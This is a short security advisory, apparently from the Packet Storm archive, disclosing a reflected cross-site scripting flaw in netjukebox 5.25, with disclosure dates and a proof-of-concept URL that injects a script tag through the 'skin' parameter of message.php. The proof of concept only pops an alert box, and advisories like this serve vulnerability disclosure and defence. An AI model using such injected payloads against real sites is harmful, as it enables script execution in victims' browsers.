netjukebox 5.25 Cross Site Scripting

2011-03-24T00:00:00
ID PACKETSTORM:99702
Type packetstorm
Reporter AutoSec Tools
Modified 2011-03-24T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................netjukebox 5.25  
Vulnerability...........Reflected Cross-site Scripting  
Threat Level............Low (1/5)  
Download................http://www.netjukebox.nl/  
Vendor Contact Date.....3/10/2011  
Disclosure Date.........3/24/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <john@autosectools.com>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A reflected cross-site scripting vulnerability in netjukebox 5.25 can  
be exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
  
http://localhost/netjukebox/message.php?skin=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E  
`